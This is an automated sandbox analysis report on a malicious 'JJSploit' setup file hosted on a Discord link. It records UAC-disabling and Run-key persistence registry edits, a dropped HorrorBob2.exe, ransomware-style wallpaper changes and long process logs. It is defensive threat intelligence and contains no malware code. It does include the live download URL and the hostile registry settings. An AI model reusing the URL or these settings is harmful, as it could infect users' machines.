Malware Analysis Report

2025-03-15 08:28

Sample ID 241020-zjjyhs1cqm
Target https://cdn.discordapp.com/attachments/824221029240274995/1296988829957357669/JJSploit_8.10.7_x64-setup.exe?ex=6714f339&is=6713a1b9&hm=72f841359f4ee2c0dea65d59ca550ad724169a9e1fb75ee81982119970e22369&
Tags
defense_evasion discovery evasion persistence ransomware trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://cdn.discordapp.com/attachments/824221029240274995/1296988829957357669/JJSploit_8.10.7_x64-setup.exe?ex=6714f339&is=6713a1b9&hm=72f841359f4ee2c0dea65d59ca550ad724169a9e1fb75ee81982119970e22369& was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery evasion persistence ransomware trojan upx

UAC bypass

Disables Task Manager via registry modification

Downloads MZ/PE file

Executes dropped EXE

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

UPX packed file

Sets desktop wallpaper using registry

Subvert Trust Controls: Mark-of-the-Web Bypass

Drops file in Windows directory

Browser Information Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Modifies registry key

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

NTFS ADS

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-20 20:44

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-20 20:44

Reported

2024-10-20 20:46

Platform

win11-20241007-en

Max time kernel

88s

Max time network

90s

Command Line

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://cdn.discordapp.com/attachments/824221029240274995/1296988829957357669/JJSploit_8.10.7_x64-setup.exe?ex=6714f339&is=6713a1b9&hm=72f841359f4ee2c0dea65d59ca550ad724169a9e1fb75ee81982119970e22369&

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Disables Task Manager via registry modification

evasion

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\HorrorBob2.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Acer NitroSense Update = "C:\\Service64\\Service64.exe" C:\Windows\SysWOW64\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Control Panel\Desktop\Wallpaper = "c:\\Service64\\blood.bmp" C:\Windows\SysWOW64\reg.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SystemTemp C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Subvert Trust Controls: Mark-of-the-Web Bypass

defense_evasion
Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\HorrorBob2.exe:Zone.Identifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\shutdown.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\HorrorBob2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133739307073391615" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" C:\Windows\system32\LogonUI.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "147" C:\Windows\system32\LogonUI.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\HorrorBob2.exe:Zone.Identifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\LogonUI.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3140 wrote to memory of 4144 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 4144 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 2828 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 2828 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
